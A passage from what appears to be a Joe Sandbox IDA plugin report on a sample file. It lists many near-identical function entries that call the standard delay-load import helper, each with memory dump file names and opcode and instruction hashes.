                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: e8a8be832125db083840e8d782d440867ba516a7be53c17fb45b2d04c63f99ae
                                                                                            • Instruction ID: d0708b2ec73b233deddecd67932cf5b0f367e22f9eebfe317cf29ab5a209185f
                                                                                            • Opcode Fuzzy Hash: e8a8be832125db083840e8d782d440867ba516a7be53c17fb45b2d04c63f99ae
                                                                                            • Instruction Fuzzy Hash: A3B012FE358000BC3904E6085E06C37027CE0C0F20330942EF815C5080E8405E000533
                                                                                            Function 00A4E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: e1925bd68afcfd0c0861a171e7e34d49371dbb60bf21c4d2361317e5b6b13644
                                                                                            • Instruction ID: 145d01e6132c0f5b64cf71368101e0697ad2d85ef1b56fbb453606e697c5a656
                                                                                            • Opcode Fuzzy Hash: e1925bd68afcfd0c0861a171e7e34d49371dbb60bf21c4d2361317e5b6b13644
                                                                                            • Instruction Fuzzy Hash: 40B012FE35D0007C3904E6055F02C37027CE0C0B20330D42EF515C5080D8401C090533
                                                                                            Function 00A4E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 41a890ee806fa2ecdc5994685636fb64d5f0e46587a7bf98d3640b1477f142e2
                                                                                            • Instruction ID: 5630b48df00432ef5b4c86c7cec1f5a45b0db2c483d5e5fb61dbe07fb3645273
                                                                                            • Opcode Fuzzy Hash: 41a890ee806fa2ecdc5994685636fb64d5f0e46587a7bf98d3640b1477f142e2
                                                                                            • Instruction Fuzzy Hash: 79B012FE359000BC3904E6055E02C37027CE0C0B20330D42EF815C5080D8405C040533
                                                                                            Function 00A4E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: e751534672a5b086c73fe71a7c14e6136f77f1d2ec006001c8a697a82851ac5a
                                                                                            • Instruction ID: d4f1318e1218d442f3c159445d7e03ae11339e8adead76ac5dfd1b19b6b9403a
                                                                                            • Opcode Fuzzy Hash: e751534672a5b086c73fe71a7c14e6136f77f1d2ec006001c8a697a82851ac5a
                                                                                            • Instruction Fuzzy Hash: C1B012DE3590007C7D04E2549F02C3B017CE0C0B20330572EF406C1080EC400E01053A
                                                                                            Function 00A4E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 380b94df52ca5870bb7e4953966c16860a2e5442f447c2ed84ea07a0f938c0d2
                                                                                            • Instruction ID: 2945b53bfa533a5fcb5b613de2d2bd1a7c91b67c215397c4f9e595880e95bf22
                                                                                            • Opcode Fuzzy Hash: 380b94df52ca5870bb7e4953966c16860a2e5442f447c2ed84ea07a0f938c0d2
                                                                                            • Instruction Fuzzy Hash: BCB012DE3591007C7D44E2549E03C37017CE0C0B20330572FF406C1080E8400D400536
                                                                                            Function 00A4E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: aa84d25a0042e4158e16f2082be07b71206067e4b754e63437f66f40beaaf951
                                                                                            • Instruction ID: 252cbb2fd0aa0fab1df075b9dc27490a374da07b55195cb948144a96a1ab11af
                                                                                            • Opcode Fuzzy Hash: aa84d25a0042e4158e16f2082be07b71206067e4b754e63437f66f40beaaf951
                                                                                            • Instruction Fuzzy Hash: E9B012DE3590007D3D04E2545E02C37017CF0C0B20330562EF405C5090E8800D000536
                                                                                            Function 00A4E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 4710b9515bd1e19494a98f5ad70e0721b7d24a08b876a43957a7225f6870da05
                                                                                            • Instruction ID: d3eea07ce975d023b2ecd43ddd8f61393e07189822098602e6e37f82fe9249d7
                                                                                            • Opcode Fuzzy Hash: 4710b9515bd1e19494a98f5ad70e0721b7d24a08b876a43957a7225f6870da05
                                                                                            • Instruction Fuzzy Hash: 92B012DE7580407C3D04E1095E02C3B457CE4C1F20330942EF406C4480E8810C010533
                                                                                            Function 00A4E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: fed0578c2ab7fbe981481ccfe3cd4ae461bf8239e4e921eaf2586db15c125412
                                                                                            • Instruction ID: 3acb8b3fdd740c687930b8c9bd99ba9d7ce34b797fd77a89ae45ae46057a352e
                                                                                            • Opcode Fuzzy Hash: fed0578c2ab7fbe981481ccfe3cd4ae461bf8239e4e921eaf2586db15c125412
                                                                                            • Instruction Fuzzy Hash: 4EB012DE7580007D3D04E1095D02D3B017CF4C1F20330542EF406C4480E8800C000533
                                                                                            Function 00A4E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 1c7ccb106681747da0824e033dc0cc4b1acd5e18e8e94473318a163900d33881
                                                                                            • Instruction ID: 2b28e5c7fd9320108f86b4902cbb497c06150a1cf482f07441d17744a70bf3a8
                                                                                            • Opcode Fuzzy Hash: 1c7ccb106681747da0824e033dc0cc4b1acd5e18e8e94473318a163900d33881
                                                                                            • Instruction Fuzzy Hash: 40B012DE7580007C3D04A1255D06C3B013CF4C1F20330543EF453C0481A8400D040433
                                                                                            Function 00A4E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: a994da0cddd3edf38d158a0186361c476a3c74a4bb4cf75f5ccacce436f63237
                                                                                            • Instruction ID: 3028f65ad39c07f931d3b1c41e51a90381efb7b9ddefa658de5d8f3b77b988a9
                                                                                            • Opcode Fuzzy Hash: a994da0cddd3edf38d158a0186361c476a3c74a4bb4cf75f5ccacce436f63237
                                                                                            • Instruction Fuzzy Hash: A7B012DE7581007C3E04E1099D03C3B017CE4C1F21330562EF407C0080E8400C440537
                                                                                            Function 00A4E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: d30510cc49230527055d98138ece0de4fc7dbdff427c485ed754626b12eab46d
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: d30510cc49230527055d98138ece0de4fc7dbdff427c485ed754626b12eab46d
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 3a92f97bd727e569cb46ed70227125d9721ab0ceb300f2ed357afb1589178da6
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 3a92f97bd727e569cb46ed70227125d9721ab0ceb300f2ed357afb1589178da6
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: e492f532fc52777c23dec17b04ccbc36ebdfc7f65766cc7ba0b287ac17102bb4
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: e492f532fc52777c23dec17b04ccbc36ebdfc7f65766cc7ba0b287ac17102bb4
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 5eebd21febd66cd72ea3760ea63fa2c86de903c7aef9ca4abf2cc223530d0c42
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 5eebd21febd66cd72ea3760ea63fa2c86de903c7aef9ca4abf2cc223530d0c42
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
